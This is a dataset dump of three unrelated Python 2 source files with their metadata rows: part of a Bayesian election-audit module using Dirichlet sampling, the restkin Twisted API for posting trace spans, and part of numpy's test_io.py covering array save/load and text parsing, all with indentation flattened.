def test_f_plurality():
"""
Simple test routine for social choice function f_plurality.
"""
P = [dummy]+[1, 1, 2, 0, 3, 1, 2]
t = 3
print "profile", P[1:]
count = tally(P,t)
print "outcome = ", f_plurality(count)
# ==> 1
P = [dummy]+[1, 2, 1, 2, 3, 4, 6]
print P[1:]
t = 6
count = tally(P,t)
print "outcome = ", f_plurality(count,{'invalid':[1]})
# ==> 2
# test_f_plurality()
######################################################################
# MAKE LIST OF HYPERPARAMETER MATRICES OR VECTORS
######################################################################
def make_prior_list(audit_type,t,ballot_polling):
"""
return list of t x t prior matrices if comparison audit
return list of t prior vectors if ballot-polling audit
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
Each matrix is t x t with integer entries (with dummy entries to account for 0-indexing of lists).
"""
prior_list = [ ]
c_digits = [ d for d in audit_type if d in string.digits ]
if c_digits != [ ] :
c = int(string.join(c_digits,sep=""))
else:
c = 1
if not ballot_polling:
if "N" in audit_type:
prior_list += [ [dummy] +
[ [dummy]+[c]*t for j in xrange(1,t+1) ] # just one matrix, c's everywhere
]
if "P" in audit_type:
prior_list += [ [dummy] + [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) for j in xrange(1,t+1) ] # one for each type k
for k in xrange(1,t+1)
]
else: # ballot polling
if "N" in audit_type:
prior_list += [ [dummy] + [c]*t ] # just one vector of all c's
if "P" in audit_type:
prior_list += [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) # one for each type k
for k in xrange(1,t+1)
]
return prior_list
# print make_prior_list("N2",3,True)
# --> [[-9, 2, 2, 2]]
# print make_prior_list("P2",3,True)
# --> [[-9, 2, 0, 0], [-9, 0, 2, 0], [-9, 0, 0, 2]]
# print make_prior_list("N2",3,False)
# --> [ [-9, [-9, 2, 2, 2], [-9, 2, 2, 2], [-9, 2, 2, 2]] ]
# print make_prior_list("P2",3,False)
# --> [ [-9, [-9, 2, 0, 0], [-9, 2, 0, 0], [-9, 2, 0, 0]],
# [-9, [-9, 0, 2, 0], [-9, 0, 2, 0], [-9, 0, 2, 0]],
# [-9, [-9, 0, 0, 2], [-9, 0, 0, 2], [-9, 0, 0, 2]]]
######################################################################
# MAKE AUDITING SCHEDULE
######################################################################
def make_schedule(n,pattern):
"""
Make up an auditing schedule (a list of sample size s values to use)
start with 0
    do pattern, then the pattern repeated, multiplied by last/first, etc.
end with n
note that last/first does not need to be an integer.
make_schedule(1000,[1,2]) # --> 0,1,2,4,8,16,32,64,128,256,512,1000
make_schedule(1000,[1,2,5,10]) # --> 0,1,2,5,10,20,50,100,200,500,1000
make_schedule(1000,[5,6]) # --> 0,5,6,7,8,10,12,14,17,21,25,30,37,44,53,64,77,...
"""
schedule = [ 0 ]
multiplier = 1
next_s = 1
while schedule[-1] < n:
for x in pattern:
next_s = int(x*multiplier)
next_s = min(n,next_s)
if next_s > schedule[-1]:
schedule.append(next_s)
multiplier *= float(pattern[-1])/float(pattern[0])
return schedule
######################################################################
# AUDIT (top-level dispatch function)
######################################################################
audit_method = "dirichlet" # switch to control dispatch
# alternative is "polya"
def audit(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon).
Each ballot type should be an integer in the range 1 to t (incl.)
ballot_polling=True if we want a ballot-polling audit.
f is the social choice function (defaults to plurality among ballot types)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
audit_type is one of (where c is an integer) (default is "N"):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
The audit stops when upset probability is at most epsilon for *all* priors in list.
returns (result, s)
where result=="OK" if the reported outcome seems OK, else result=="NOT OK"
and where s == number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
if audit_method == "dirichlet":
return audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
elif audit_method == "polya":
import polya
return polya.audit_polya(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
else:
print "In audit(): illegal audit_method specification:",audit_method
quit()
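# Example call (illustrative; r, a, t as described in the docstring above):
# result, s = audit(r, a, t, 0.05, make_schedule(len(r)-1, [1, 2]), audit_type="N")
# --> result is "OK" or "NOT OK", s is the number of ballots audited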
######################################################################
# DIRICHLET DISTRIBUTION
######################################################################
def dirichlet(alphas,n):
"""
Sample from a Dirichlet distribution.
return n times a Dirichlet random variable generated according to the given alphas.
note that alphas[0] is dummy to be ignored.
ignores alphas that are 0 (i.e. generates a zero component here)
returns vector x of same length as alphas
"""
# print "alphas",alphas
t = len(alphas)-1
x = [dummy] + [0.0]*t
sumx = 0.0
for k in xrange(1,t+1):
if alphas[k]>0.0:
x[k] = random.gammavariate(alphas[k],1)
sumx += x[k]
assert sumx > 0.0
for k in xrange(1,t+1):
x[k] = n * x[k] / sumx
return x
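# Example (illustrative; output is random):
# print dirichlet([dummy, 2, 1, 1], 10)
# --> [-9, 5.1, 2.3, 2.6]  (components are nonnegative and sum to 10)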
######################################################################
# AUDIT USING DIRICHLET DISTRIBUTION
######################################################################
def audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon)
Each ballot type should be an integer in the range 1 to t (incl.)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
ballot_polling=True if we want a ballot_polling audit (then r is ignored)
f is the social choice function (defaults to plurality among ballot types)
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
returns ("OK",s) if the reported outcome seems OK
Otherwise it returns ("NOT OK",s)
where s is the number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
R = tally(r,t)
reported_outcome = f(R)
A = tally(a,t)
actual_outcome = f(A)
prior_list = make_prior_list(audit_type,t,ballot_polling)
if printing_wanted:
print "%8d = number of ballot types"%t
print "%8d = number of total ballots"%n
print "%8.4f = epsilon (upset probabilitylimit)"%epsilon
print "audit_type = ",audit_type
print "%8d = number of priors"%len(prior_list)
for x in R[1:]:
print "%8d "%x,
print "= counts of reported ballots (reported outcome is %4d )"%reported_outcome
for x in A[1:]:
print "%8d "%x,
print "= counts of actual ballots (actual outcome is %4d )"%actual_outcome
print "Ballot-polling audit:",ballot_polling
# main loop -- do samples of given sizes from schedule
s = 0
# initialize counts to zero
if not ballot_polling:
count = [dummy] + [ [dummy]+[0]*t for j in xrange(1,t+1) ] # allocate this only once
else: # ballot-polling
count = [dummy]+[0]*t # allocate this only once
for next_s in schedule:
# audit enough ballots so that s = next_s
while s < next_s:
s = s + 1
# In practice you'd be looking at a paper ballot in the next line;
# in this code, we assume actual ballot types already available in array a.
pass # <-- audit ballot number s here; that is, determine a[s]
if not ballot_polling:
count[r[s]][a[s]] += 1
else:
count[a[s]] += 1
# now number of ballots audited is s
max_upset_prob = -1.0
for prior in prior_list:
# Determine probability of each outcome (dictionary "wins")
# Determine u the probability of an election upset
# Determine z the number of simulated profiles examined within upset_prob_dirichlet routine
wins,u,z = win_probs(r,a,t,s,n,count,ballot_polling,f,prior)
if printing_wanted:
print "After %6d ballots audited, probability of an upset is %7.4f"%(s,u),"(z = %4d simulated profiles)"%z,
print "(winning probabilities are:",wins,")"
max_upset_prob = max(u,max_upset_prob)
breakout = True
if breakout and max_upset_prob > epsilon: # don't bother with other priors
break
# decide to quit if max_upset prob is at most epsilon
if max_upset_prob<=epsilon:
if printing_wanted:
print "Reported election outcome is OK (%d ballots audited)"%s
# print "count:",count
return ("OK",s)
else:
if printing_wanted:
print "Reported election outcome was NOT OK !!! (All %d ballots audited)"%n
return ("NOT OK",s)
def win_probs(r,a,t,s,n,count,ballot_polling=False,f=f_plurality,prior=None):
"""
Use simulation to determine the probability of each outcome.
s is sample size (so far), 0 <= s <= n
for comparison audit:
count[j][k] is number of ballots of reported type j and actual type k (plus hyperparameter prior[j][k]) in ballots 1..s
for ballot-polling audit
count[k] is number of ballots of actual type k (plus hyperparameter prior[k]) in ballots 1..s
ballot_polling is True iff we want a ballot-polling audit
f is social choice function
return dictionary mapping outcomes to frequency of winning, upset probability, and max_trials
"""
R = tally(r,t) # tally of reported votes
if not ballot_polling: # only have reported votes if not ballot polling
reported_outcome = f(R)
max_trials = 10000 # determines accuracy of u (upset probability)
upsets = 0
B = [dummy] + [0]*t # allocate this only once (tally for simulated profile)
alphas = [dummy] + [0]*t # allocate only once (alphas for Dirichlet)
wins = dict() # keep track of number of wins for each outcome
for j in xrange(1,t+1):
wins[j] = 0
if not ballot_polling: # comparison audit
Rrem = [dummy] + [0]*t # Rrem[j] is number remaining unaudited of reported type j
for j in xrange(1,t+1):
Rrem[j] = R[j] # number remaining unaudited of reported type j
for j in xrange(1,t+1):
for k in xrange(1,t+1):
Rrem[j] -= count[j][k]
for z in xrange(1,max_trials+1):
for k in xrange(1,t+1):
B[k] = 0 # initialize tally for profile b to zero.
for j in xrange(1,t+1): # add in actual counts for ballots audited so far
for k in xrange(1,t+1):
B[k] += count[j][k]
for j in xrange(1,t+1): # for each reported type
for k in xrange(1,t+1):
alphas[k] = prior[j][k] + count[j][k]
ds = dirichlet(alphas,Rrem[j]) # note: Rrem[j] is remaining size of profile of reported type j after sample
for k in xrange(1,t+1):
B[k] += ds[k] # add to counts for sample
new_outcome = f(B)
wins[new_outcome] = wins.get(new_outcome,0)+1
if new_outcome != reported_outcome:
upsets += 1
else: # ballot-polling audit
for k in xrange(1,t+1):
alphas[k] = prior[k] + count[k]
for z in xrange(1,max_trials+1):
ds = dirichlet(alphas,n-s) # n-s = number of unaudited ballots
for k in xrange(1,t+1):
ds[k] += count[k] # add counts to dirichlet for simulated ballot tally
new_outcome = f(ds)
wins[new_outcome] = wins.get(new_outcome,0)+1
# for ballot-polling audit, "upset prob" is 1 - max winning prob
upsets = max_trials - max(wins.values())
for outcome in wins.keys():
wins[outcome] = float(wins[outcome])/float(max_trials)
u = float(upsets) / float(max_trials)
return wins,u,max_trials
| mit | -1,709,334,529,340,910,800 | 42.330645 | 127 | 0.553136 | false | 3.784469 | false | false | false |
zhaoxuan/baidu_restkin | restkin/api.py | 1 | 4948 | # Copyright 2012 Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pdb
from twisted.web import http
from twisted.python import log
from twisted.web.resource import Resource, NoResource
from tryfer.trace import Trace, Annotation, Endpoint
from restkin.utils import decode_hex_number
class RProxyWrapper(Resource):
rp_error_to_http_code = {
'NR-1000': http.UNAUTHORIZED,
'NR-1001': http.UNAUTHORIZED,
'NR-1002': http.UNAUTHORIZED,
'NR-5000': http.INTERNAL_SERVER_ERROR,
        'NR-2000': 429  # httpbis - Too Many Requests
}
def __init__(self, wrapped):
Resource.__init__(self)
self._wrapped = wrapped
def render(self, request):
headers = request.requestHeaders
rp_error_code = headers.getRawHeaders('X-RP-Error-Code')[0]
rp_error_response = headers.getRawHeaders('X-RP-Error-Message')[0]
request.setResponseCode(
self.rp_error_to_http_code.get(
rp_error_code, http.INTERNAL_SERVER_ERROR))
request.responseHeaders.setRawHeaders(
'Content-Type', ['application/json'])
return json.dumps({'ok': False,
'error_code': rp_error_code,
'error_message': rp_error_response})
def getChild(self, path, request):
if request.requestHeaders.hasHeader('X-RP-Error-Code'):
return self
return self._wrapped.getChild(path, request)
class RootResource(Resource):
def getChild(self, path, request):
if path == 'v1.0':
return VersionResource()
return NoResource()
class VersionResource(Resource):
def getChild(self, path, request):
if path == 'trace':
return TraceResource()
return NoResource()
# class TenantResource(Resource):
# def __init__(self, tenant_id):
# Resource.__init__(self)
# self._tenant_id = tenant_id
# def getChild(self, path, request):
# if path == 'trace':
# return TraceResource()
# return NoResource()
class TraceResource(Resource):
"""
TraceResource is responsible for taking POST requests and converting
    the posted JSON body into scribe log entries.
Response formats:
Success or partial failure:
{"succeeded": numberOfSucesfullyInsertedTraces,
"failed": numberOfTracesWhichFailedInsertion}
Failure due to invalid body:
{"error": "Error message"}
"""
def render_POST(self, request):
request.responseHeaders.setRawHeaders(
'content-type', ['application/json'])
body = request.content.read()
try:
spans = json.loads(body)
except ValueError:
log.err(None, 'Failed to decode request body')
msg = 'Could not decode request body (invalid JSON)'
return json.dumps({'error': msg})
succeeded, failed = 0, 0
for json_span in spans:
trace_id = None
span_id = None
try:
trace_id = decode_hex_number('trace_id', json_span['trace_id'])
span_id = decode_hex_number('span_id', json_span['span_id'])
parent_span_id = json_span.get('parent_span_id', None)
if parent_span_id is not None:
parent_span_id = decode_hex_number('parent_span_id',
parent_span_id)
t = Trace(json_span['name'], trace_id, span_id, parent_span_id)
for json_annotation in json_span['annotations']:
annotation = Annotation(
json_annotation['key'],
json_annotation['value'],
json_annotation['type'])
host = json_annotation.get('host', None)
if host:
annotation.endpoint = Endpoint(
host['ipv4'], host['port'], host['service_name'])
t.record(annotation)
succeeded = succeeded + 1
except Exception:
log.err(None,
'Failed to insert a trace: trace_id=%r,span_id=%r' %
(trace_id, span_id))
failed = failed + 1
continue
return json.dumps({'succeeded': succeeded, 'failed': failed})
| apache-2.0 | -2,226,201,732,277,251,300 | 30.316456 | 79 | 0.580841 | false | 4.258176 | false | false | false |
qpython-android/QPypi-numpy | numpy/lib/tests/test_io.py | 1 | 31157 | import numpy as np
import numpy.ma as ma
from numpy.ma.testutils import *
import StringIO
import gzip
import os
from tempfile import mkstemp, NamedTemporaryFile
import sys, time
from datetime import datetime
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO.StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, StringIO.StringIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform=='win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a,b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO.StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
class TestSaveTxt(TestCase):
def test_array(self):
a =np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO.StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)])
a =np.array([[1, 2], [3, 4]], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['1\n', '2\n', '3\n', '4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO.StringIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1,2\n', '3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO.StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), ['01 2.0\n', '03 4.0\n'])
# A single multiformat string
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
        # Specify delimiter, should be overridden
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO.StringIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender','age','weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO.StringIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO.StringIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:,1])
a =np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
        # Checking with dtype-defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO.StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], ["JOE", "BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO.StringIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_empty_file(self):
c = StringIO.StringIO()
assert_raises(IOError, np.loadtxt, c)
def test_unused_converter(self):
c = StringIO.StringIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
class Testfromregex(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO.StringIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender','age','weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO.StringIO('1 2\n3 4')
control = np.array([[1,2],[3,4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1,2],[3,4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO.StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO.StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = StringIO.StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
#
data = StringIO.StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
#
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
def test_header(self):
"Test retrieving a header"
data = StringIO.StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(['M', 'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO.StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(['A', 'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3+4j, 5+6j]),
np.array([True, False]),]
assert_equal(test.dtype.names, ['f0','f1','f2','f3','f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO.StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1,2,3,4],[5,6,7,8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g','a','w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender','age','weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO.StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender','|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO.StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
